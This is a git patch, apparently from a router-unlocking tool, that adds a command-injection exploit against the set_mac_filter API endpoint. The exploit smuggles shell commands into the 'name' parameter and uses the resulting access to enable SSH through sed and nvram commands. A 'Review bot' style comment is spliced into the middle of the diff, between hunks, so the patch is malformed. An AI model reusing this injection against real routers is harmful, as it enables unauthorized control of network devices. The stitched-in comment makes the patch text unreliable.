From 168878255b1282861569a7bfa765905df5cff5a4 Mon Sep 17 00:00:00 2001
From: remittor
Date: Sun, 20 Apr 2025 20:05:48 +0300
Subject: [PATCH] connect6: Add new exploit "set_mac_filter" (vuln already closed)

---
 connect6.py | 28 ++++++++++++++++++++++++++--
 1 file changed, 26 insertions(+), 2 deletions(-)

diff --git a/connect6.py b/connect6.py
index 10c15c8..5bc37c7 100644
--- a/connect6.py
+++ b/connect6.py
@@ -38,13 +38,34 @@ def exploit_2(cmd, api = 'API/xqsystem/start_binding'):
 res = ''
 return res
+def exploit_3(cmd, api = 'API/xqsystem/set_mac_filter'):
+ # vuln/exploit author: ?????????
+ if '\n' in cmd:
+ raise ValueError('Incorrect shell command format')
+ options = { 'add': 0, 'del': 1 }
+ for action, option in options.items():
+ time.sleep(0.05)
+ time_ms = time.time_ns() // 1_000_000
+ name = f'xxx ; uci set diag.config.usb_read_thr={time_ms} ; uci commit diag ; ' + cmd
+ params = { 'mac': '00:00:00:00:00:33', 'name': name, 'option': option, 'wan': '' }
+ try:
+ res = gw.api_request(api, params, resp = 'text', timeout = 2)
+ except requests.exceptions.ReadTimeout:
+ res = ''
+ if not res or '"code":0' not in res:
+ return ''
+ diag = gw.get_diag_paras(timeout = 2)
+ if str(diag['usb_read_thr']) == str(time_ms):
+ return res # Ok
+ return ''
+
 # set default value for iperf_test_thr
 gw.set_diag_iperf_test_thr(20)
 vuln_test_num = 82000011
 exec_cmd = None
-exp_list = [ exploit_2, exploit_1 ]
+exp_list = [ exploit_2, exploit_1, exploit_3 ]
 for idx, exp_func in enumerate(exp_list):
 exp_test_num = vuln_test_num + idx
 res = exp_func(f"uci set diag.config.iperf_test_thr={exp_test_num} ; uci commit diag")
@@ -60,7 +81,7 @@ for idx, exp_func in enumerate(exp_list):
 gw.set_diag_iperf_test_thr(20)
 if not exec_cmd:
- raise ExploitNotWorked('Exploits "arn_switch/start_binding" not working!!!')
+ raise ExploitNotWorked('Exploits "arn_switch/start_binding/set_mac_filter" not working!!!')
 if exec_cmd == exploit_1:
 print('Exploit "arn_switch" detected!')
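Review bot: The loop variable `action` in `for action, option in options.items():` inside exploit_3 is never read in the body, and the `# vuln/exploit author: ?????????` placeholder leaves the new function without any header documentation even though the commit subject says this path is already closed. Iterate the values instead, `for option in options.values():`, or name the unused key `_action` so the intent is visible to linters. Replace the placeholder with a short comment stating that the set_mac_filter request path is reported closed (per the commit subject), so a reader knows that the empty-string return is the expected outcome on current firmware and not a transport failure. The updated `raise ExploitNotWorked(...)` message in the second hunk is consistent with the new list entry and needs no change.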
@@ -68,6 +89,9 @@ if exec_cmd == exploit_1:
 if exec_cmd == exploit_2:
 print('Exploit "start_binding" detected!')
+if exec_cmd == exploit_3:
+ print('Exploit "set_mac_filter" detected!')
+
 exec_cmd(r"sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
 exec_cmd(r"nvram set ssh_en=1 ; nvram set boot_wait=on ; nvram set bootdelay=3 ; nvram commit")